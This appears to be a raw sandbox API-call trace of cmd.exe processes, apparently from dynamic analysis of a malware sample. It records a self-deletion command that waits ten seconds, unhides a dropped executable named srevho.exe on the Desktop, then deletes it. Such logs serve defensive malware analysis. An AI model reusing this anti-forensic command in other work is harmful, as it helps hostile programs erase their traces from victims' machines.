(lpRootPathName="C:\\") returned 0x3 [0084.039] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x2cee28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee28) returned 0xffffffff [0084.039] GetLastError () returned 0x2 [0084.039] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\choice", fInfoLevelId=0x1, lpFindFileData=0x2cee28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee28) returned 0xffffffff [0084.090] GetLastError () returned 0x2 [0084.091] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0084.091] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x2cee28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee28) returned 0x623618 [0084.091] GetProcessHeap () returned 0x610000 [0084.091] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x623658 [0084.091] FindClose (in: hFindFile=0x623618 | out: hFindFile=0x623618) returned 1 [0084.091] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.COM", fInfoLevelId=0x1, lpFindFileData=0x2cee28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee28) returned 0xffffffff [0084.092] GetLastError () returned 0x2 [0084.092] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cee28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee28) returned 0x623618 [0084.092] GetProcessHeap () returned 0x610000 [0084.092] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x623658, Size=0x4) returned 0x623658 [0084.092] FindClose (in: hFindFile=0x623618 | out: hFindFile=0x623618) returned 1 [0084.092] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0084.092] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0084.092] GetConsoleTitleW (in: lpConsoleTitle=0x2cf320, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.092] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf1a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf270 | out: lpAttributeList=0x2cf1a8, lpSize=0x2cf270) returned 1 [0084.092] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf1a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf268, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf1a8, lpPreviousValue=0x0) returned 1 [0084.092] GetStartupInfoW (in: lpStartupInfo=0x2cf164 | out: lpStartupInfo=0x2cf164*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0084.092] GetProcessHeap () returned 0x610000 [0084.093] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x623618 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.093] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0084.094] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0084.094] GetProcessHeap () returned 0x610000 [0084.094] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x623618 | out: hHeap=0x610000) returned 1 [0084.094] GetProcessHeap () returned 0x610000 [0084.094] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa) returned 0x620038 [0084.094] lstrcmpW (lpString1="\\choice.exe", lpString2="\\XCOPY.EXE") returned -1 [0084.096] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\choice.exe", lpCommandLine="choice /t 10 /d y ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2cf204*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="choice /t 10 /d y ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf250 | out: lpCommandLine="choice /t 10 /d y ", lpProcessInformation=0x2cf250*(hProcess=0x78, hThread=0x74, dwProcessId=0xa00, dwThreadId=0xa10)) returned 1 [0084.103] CloseHandle (hObject=0x74) returned 1 [0084.103] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0084.103] GetProcessHeap () returned 0x610000 [0084.103] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625830 | out: hHeap=0x610000) returned 1 [0084.103] GetEnvironmentStringsW () returned 0x6245d0* [0084.103] GetProcessHeap () returned 0x610000 [0084.103] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb36) returned 0x625110 [0084.103] FreeEnvironmentStringsW (penv=0x6245d0) returned 1 [0084.103] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) Process: id = "28" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3b0d4000" os_pid = "0xa34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x754" cmd_line = "cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 350 os_tid = 0x6c0 [0083.991] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32f934 | out: lpSystemTimeAsFileTime=0x32f934*(dwLowDateTime=0xd48c5920, dwHighDateTime=0x1d64ac6)) [0083.991] GetCurrentProcessId () returned 0xa34 [0083.992] GetCurrentThreadId () returned 0x6c0 [0083.992] GetTickCount () returned 0x114ed0e [0083.992] QueryPerformanceCounter (in: lpPerformanceCount=0x32f92c | out: lpPerformanceCount=0x32f92c*=20464842459) returned 1 [0083.993] GetModuleHandleA (lpModuleName=0x0) returned 0x4a2d0000 [0084.040] __set_app_type (_Type=0x1) [0084.040] __p__fmode () returned 0x770331f4 [0084.040] __p__commode () returned 0x770331fc [0084.040] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a2f21a6) returned 0x0 [0084.041] __getmainargs (in: _Argc=0x4a2f4238, _Argv=0x4a2f4240, _Env=0x4a2f423c, _DoWildCard=0, _StartInfo=0x4a2f4140 | out: _Argc=0x4a2f4238, _Argv=0x4a2f4240, _Env=0x4a2f423c) returned 0 [0084.041] GetCurrentThreadId () returned 0x6c0 [0084.041] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6c0) returned 0x60 [0084.041] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0084.041] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0084.041] SetThreadUILanguage (LangId=0x0) returned 0x409 [0084.042] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.042] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32f8c4 | out: phkResult=0x32f8c4*=0x0) returned 0x2 [0084.042] VirtualQuery (in: lpAddress=0x32f8fb, lpBuffer=0x32f894, dwLength=0x1c | out: lpBuffer=0x32f894*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0084.042] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32f894, dwLength=0x1c | out: lpBuffer=0x32f894*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0084.042] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32f894, dwLength=0x1c | out: lpBuffer=0x32f894*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0084.042] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32f894, dwLength=0x1c | out: lpBuffer=0x32f894*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0084.042] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32f894, dwLength=0x1c | out: lpBuffer=0x32f894*(BaseAddress=0x330000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xd0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0084.042] GetConsoleOutputCP () returned 0x1b5 [0084.043] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0084.043] SetConsoleCtrlHandler (HandlerRoutine=0x4a2ee72a, Add=1) returned 1 [0084.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0084.043] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0084.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0084.043] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2f41ac | out: lpMode=0x4a2f41ac) returned 1 [0084.044] _get_osfhandle (_FileHandle=1) returned 0x7 [0084.044] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0084.044] _get_osfhandle (_FileHandle=0) returned 0x3 [0084.044] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2f41b0 | out: lpMode=0x4a2f41b0) returned 1 [0084.044] _get_osfhandle (_FileHandle=0) returned 0x3 [0084.044] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0084.045] GetEnvironmentStringsW () returned 0x562158* [0084.045] GetProcessHeap () returned 0x550000 [0084.045] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xaca) returned 0x562c30 [0084.045] FreeEnvironmentStringsW (penv=0x562158) returned 1 [0084.045] GetProcessHeap () returned 0x550000 [0084.045] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4) returned 0x561848 [0084.045] GetEnvironmentStringsW () returned 0x562158* [0084.045] GetProcessHeap () returned 0x550000 [0084.045] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xaca) returned 0x563708 [0084.046] FreeEnvironmentStringsW (penv=0x562158) returned 1 [0084.046] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e834 | out: phkResult=0x32e834*=0x68) returned 0x0 [0084.046] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x0, lpData=0x32e840*=0x0, lpcbData=0x32e838*=0x1000) returned 0x2 [0084.046] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x4, lpData=0x32e840*=0x1, lpcbData=0x32e838*=0x4) returned 0x0 [0084.046] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x0, lpData=0x32e840*=0x1, lpcbData=0x32e838*=0x1000) returned 0x2 [0084.046] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x4, lpData=0x32e840*=0x0, lpcbData=0x32e838*=0x4) returned 0x0 [0084.046] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x4, lpData=0x32e840*=0x40, lpcbData=0x32e838*=0x4) returned 0x0 [0084.046] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x4, lpData=0x32e840*=0x40, lpcbData=0x32e838*=0x4) returned 0x0 [0084.046] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x0, lpData=0x32e840*=0x40, lpcbData=0x32e838*=0x1000) returned 0x2 [0084.046] RegCloseKey (hKey=0x68) returned 0x0 [0084.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e834 | out: phkResult=0x32e834*=0x68) returned 0x0 [0084.047] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x0, lpData=0x32e840*=0x40, lpcbData=0x32e838*=0x1000) returned 0x2 [0084.047] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x4, lpData=0x32e840*=0x1, lpcbData=0x32e838*=0x4) returned 0x0 [0084.047] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x0, lpData=0x32e840*=0x1, lpcbData=0x32e838*=0x1000) returned 0x2 [0084.047] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x4, lpData=0x32e840*=0x0, lpcbData=0x32e838*=0x4) returned 0x0 [0084.047] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x4, lpData=0x32e840*=0x9, lpcbData=0x32e838*=0x4) returned 0x0 [0084.047] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x4, lpData=0x32e840*=0x9, lpcbData=0x32e838*=0x4) returned 0x0 [0084.047] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e83c, lpData=0x32e840, lpcbData=0x32e838*=0x1000 | out: lpType=0x32e83c*=0x0, lpData=0x32e840*=0x9, lpcbData=0x32e838*=0x1000) returned 0x2 [0084.047] RegCloseKey (hKey=0x68) returned 0x0 [0084.047] time (in: timer=0x0 | out: timer=0x0) returned 0x5ef459d8 [0084.047] srand (_Seed=0x5ef459d8) [0084.047] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\"" [0084.047] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\"" [0084.048] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a2f5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0084.048] GetProcessHeap () returned 0x550000 [0084.048] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x562158 [0084.048] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x562160, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0084.048] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0084.048] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0084.049] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0084.049] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0084.049] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0084.049] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0084.049] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0084.049] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0084.049] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0084.049] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0084.049] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0084.049] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0084.049] GetProcessHeap () returned 0x550000 [0084.049] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x562c30 | out: hHeap=0x550000) returned 1 [0084.049] GetEnvironmentStringsW () returned 0x562370* [0084.049] GetProcessHeap () returned 0x550000 [0084.049] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xae2) returned 0x564cd0 [0084.049] FreeEnvironmentStringsW (penv=0x562370) returned 1 [0084.049] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.049] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0084.049] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0084.049] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0084.050] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0084.050] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0084.050] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0084.050] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0084.050] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0084.050] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0084.050] GetProcessHeap () returned 0x550000 [0084.050] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x54) returned 0x5657c0 [0084.050] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f600 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0084.050] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x32f600, lpFilePart=0x32f5fc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32f5fc*="Desktop") returned 0x25 [0084.050] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0084.050] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32f37c | out: lpFindFileData=0x32f37c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x561fd8 [0084.050] FindClose (in: hFindFile=0x561fd8 | out: hFindFile=0x561fd8) returned 1 [0084.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32f37c | out: lpFindFileData=0x32f37c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcfe629a0, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xcfe629a0, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x561fd8 [0084.051] FindClose (in: hFindFile=0x561fd8 | out: hFindFile=0x561fd8) returned 1 [0084.051] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0084.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32f37c | out: lpFindFileData=0x32f37c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd637660, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xcd637660, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x561fd8 [0084.051] FindClose (in: hFindFile=0x561fd8 | out: hFindFile=0x561fd8) returned 1 [0084.051] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0084.051] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0084.051] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0084.051] GetProcessHeap () returned 0x550000 [0084.051] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564cd0 | out: hHeap=0x550000) returned 1 [0084.052] GetEnvironmentStringsW () returned 0x5641e0* [0084.052] GetProcessHeap () returned 0x550000 [0084.052] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb36) returned 0x565820 [0084.052] FreeEnvironmentStringsW (penv=0x5641e0) returned 1 [0084.052] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a2f5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0084.052] GetProcessHeap () returned 0x550000 [0084.052] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5657c0 | out: hHeap=0x550000) returned 1 [0084.052] GetProcessHeap () returned 0x550000 [0084.052] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400e) returned 0x566360 [0084.053] GetProcessHeap () returned 0x550000 [0084.053] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x120) returned 0x550ff0 [0084.053] GetProcessHeap () returned 0x550000 [0084.053] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566360 | out: hHeap=0x550000) returned 1 